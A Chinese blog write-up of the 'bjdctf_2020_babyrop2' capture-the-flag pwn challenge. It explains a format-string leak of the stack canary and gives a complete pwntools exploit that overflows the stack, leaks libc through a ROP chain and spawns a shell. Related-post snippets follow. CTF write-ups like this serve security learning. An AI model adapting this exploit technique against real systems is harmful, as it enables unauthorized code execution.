[CTF]bjdctf_2020_babyrop2

最新推荐文章于 2023-04-10 18:42:00 发布
最新推荐文章于 2023-04-10 18:42:00 发布
阅读量383 收藏 1
点赞数
分类专栏: ctf pwn 文章标签: python pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_50819561/article/details/120640179
版权
ctf 同时被 2 个专栏收录
10 篇文章 0 订阅
订阅专栏
pwn
10 篇文章 2 订阅
订阅专栏

格式化字符串漏洞+金丝雀绕过。
在这里插入图片描述
出现这种形式的,v2就是canary。
查看他在栈里的位置。
在这里插入图片描述
var_8就是canary。
利用格式化字符串漏洞。
%6$p表示输出第六个参数。
在这里插入图片描述
发现我们输入的东西在第六个参数的位置。
在这里插入图片描述
调试之后发现有一串随机的十六进制数字。这就是canary。由此可见,这个canary在第七个参数的位置。
于是我们先用格式话字符串泄露第七个参数位置上的内容,每一次进行栈溢出的时候把泄露出来的值填入即可。
代码如下:

from pwn import *
from LibcSearcher import *


#r=remote('node4.buuoj.cn','25605')
r=process('bjdctf_2020_babyrop2')
elf=ELF('bjdctf_2020_babyrop2')
context.log_level = 'debug'
libc = ELF("./libc-2.23.so")
#context.terminal = ['tmux','splitw','-h']
puts_got=elf.got['puts']
puts_libc=libc.sym['puts']
vuln=elf.sym['vuln']
puts_plt=elf.plt['puts']
pop_rdi=0x0000000000400993


system_libc=libc.sym['system']
bin_sh=0x000000000018CD57

payload='%7$p'
r.recvuntil("I'll give u some gift to help u!\n")
r.sendline(payload)
gdb.attach(r)
pause()
r.recvuntil('0x')
canary=int(r.recv(16),16)
print(hex(canary))

r.recvuntil("Pull up your sword and tell me u story!\n")
payload='a'*0x18+p64(canary)+'a'*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(vuln)
r.sendline(payload)
puts_addr=u64(r.recv(6).ljust(8,'\x00'))
print (hex(puts_addr))
offset=puts_addr-puts_libc
system_addr=offset+system_libc
binsh=offset+bin_sh

r.recvuntil('Pull up your sword and tell me u story!\n')
payload='a'*0x18+p64(canary)+'a'*8+p64(pop_rdi)+p64(binsh)+p64(system_addr)+p64(vuln)
r.sendline(payload)
r.interactive()
永远在深夜里就好了
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTFbjdctf_2020_babyrop2(write up)
qq_44768749的博客
08-26 901
BUUCTFbjdctf_2020_babyrop20x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 64位程序,开启栈不可执行、canary、部分RELRO保护 0x02 运行 输入两次字符串 0x03 IDA main函数 调用了下面三个函数 init函数 初始化,输出提示 gift函数 存在格式化字符串漏洞 vuln函数 存在栈溢出漏洞 0x04 思路 开启canary保护 可利用gift函数
亚信java笔试题-BJDCTF2020_March:本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、江苏大学、湖南
06-03
亚信java笔试题 BJDCTF2020_March 本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、 江苏大学、湖南工业大学(排名不分先后)联合举办 Notes:web题目easyaspnet需要在windows server 2016 docker native container 环境下 build 和 run web Schrödinger - imagin tags: 查看源码 时间戳 修改cookie 打开网页,发现是个 login fucker,推测题目的意思是找一个能 fuck 的 login page,查看源码发现有一行白色的字体不显示,提示有 test.php,访问发现是个登录框。将 http://localhost/test.php 提交,发现网站貌似开始了爆破,但是爆破成功率却涨的很慢。查看 cookie 发现有个 base64 的 cookie 很可疑,decode 一下发现是提交时的时间戳。 将该 cookie 直接置空,刷新页面就发现成功率接近百分之百,check 一下得到爆破的结果. 通过 av 号在 b 站找到对应的视频,根据
bjdctf_2020_babyrop2-fmt-leak canary
个人笔记
04-10 381
这使得参数可以输出多次,使用多个格式说明符,以不同的顺序输出。本地libc下载:https://github.com/Yeuoly/buuctf_pwn/tree/master/bjdctf_2020_babyrop2。printf(“%p”, a) 用地址的格式打印变量 a 的值,printf(“%p”, &a) 打印变量 a 所在的地址。思路:aa相当于定位标识,format在格式化假参数6的位置,所以构造成。2,IDA静态分析,查看可以泄露canary的地方,否则只能爆破了。canary的位置:即。
bjdctf_2020_babyrop2
m0sway的博客
11-26 1308
bjdctf_2020_babyrop2 使用checksec查看: 开启了Canary和栈不可执行,这题看标题就知道是一题栈溢出构造rop链的题目,存在Canary就代表我们首先要做的就是获取到Canary的值。 拉进IDA中查看: main()函数中给了两个函数,首先看下gift(): printf(&format)这里就一个明显的格式化字符串漏洞,可通过该漏洞获取到Canary的值 Canary的值固定是rbp-8,so…用gdb调试可以看到就在我们输入的下方 用%7$p就可以拿到Can
pwn7第七关
qq_18823653的博客
04-03 381
前面几个懒得写了,直接第七个吧,溢出点和前面一样get()函数,112字节,保护只开了NX程序本身没有system(),也没有/bin/sh,且栈不可执行,用ROPgadget也没找到有用的语句,但是程序是动态链接的,运行时会加载so库,可以用put()泄露出put的真实地址,又因为ASLR随机化不了地址底12位,可以用put真实地址的底12位查询加载的那个版本的libc.so,以及确定libc的...
CTFbjdctf_2020_babyrop
凉水的博客
06-18 673
bjdctf_2020_babyrop
[BUUCTF]PWN——bjdctf_2020_babyrop
mcmuyanga的博客
10-07 2817
bjdctf_2020_babyrop[64位libc泄露] 题目附件 解题步骤: 例行检查,64位程序,开启了NX保护 试运行一下程序,看看大概的情况,看提示,应该是道泄露libc的题目 64位ida载入,shift+f12检索程序里的字符串,没有找到可以直接使用的system(’/bin/sh’) 从main函数开始看程序 main函数调用了一个vuln函数 buf的大小是0x20,read读入的长度是0x64,明显的溢出漏洞 根据已有的信息和得到的提示,是一道64位的libc泄露 利用思路:
bjdctf_2020_babyrop【BUUCTF
qq_41696518的博客
08-31 308
bjdctf_2020_babyrop
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
CTF_snow_隐写工具
05-19
CTF_snow_隐写工具,找了好久才找到,非常好用,打CTF比赛必备!!!
CTF神器_ctf
09-23
对网站文件管理,对网站后台文件进行扫描。。
轩禹CTF_RSA工具3.6.1.zip
最新发布
01-29
CTF常用工具集
CTF工具大全_2020.08.rar
08-10
CTF工具大全_2020.08.rar
BUUCTF-bjdctf_2020_babyrop2-WP
Rt1Text的博客
02-12 250
64位,NX和canary保护。
bjdctf_2020_babyrop 与bjdctf_2020_babyrop2(格式化字符leak)
beaster1的博客
04-06 423
bjdctf_2020_babyrop 先checksec 打开ida正常查看函数 打开init函数发现puts函数 然后进入vuln函数 存在栈溢出 没有看到后门函数应该是libc leak+rop 代码如下 from pwn import* from LibcSearcher import* p=remote('node3.buuoj.cn',29901) #p=process('') elf=ELF('bjdctf_2020_babyrop') puts_got=elf.got['puts'] p
BUUCTF bjdctf_2020_babyrop 1 和 2
BengDouLove的博客
04-09 1458
这两个rop其实是差不多的,第二个比第一个多了一个canary 先看一下第一个 bjdctf_2020_babyrop1 init里面两个puts vul里面一个puts一个read 没有system和binsh ,要泄露libc,但是现在没有可以控制的输出手段,,所以要通过read,,覆盖返回地址为puts,,构造参数让puts输出libc的函数 这是网上别人的做法,,首先到pop rd...
【BUUCTFbjdctf_2020_babyrop2
m0_51251108的博客
12-30 337
【BUUCTFbjdctf_2020_babyrop2 有canary ida看下程序 有格式化漏洞,但有6格宽度限制 有栈溢出 思路:这题靠格式化字符串漏洞泄露出canary的地址 然后栈溢出,ret2libc 泄露方法: 一次一次试过去,找到我们输入的位置的偏移 然后这题里偏移+1就是canary了 然后就能把canary带出来,canary每次运行都不一样 所以要实时接收 一个程序不同函数的canary好像都相同 特别提醒自己在接收环节的处理 exp: from pwn import*
ctf Web_php_include
08-28
2. 利用漏洞点:构造特定的请求,使得服务器执行恶意代码或读取敏感文件。 3. 获取目标:根据题目要求,尝试获取相应的 flag 或其他标识符。 4. 提交答案:将 flag 或其他标识符提交给比赛组织者验证。 请注意,在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值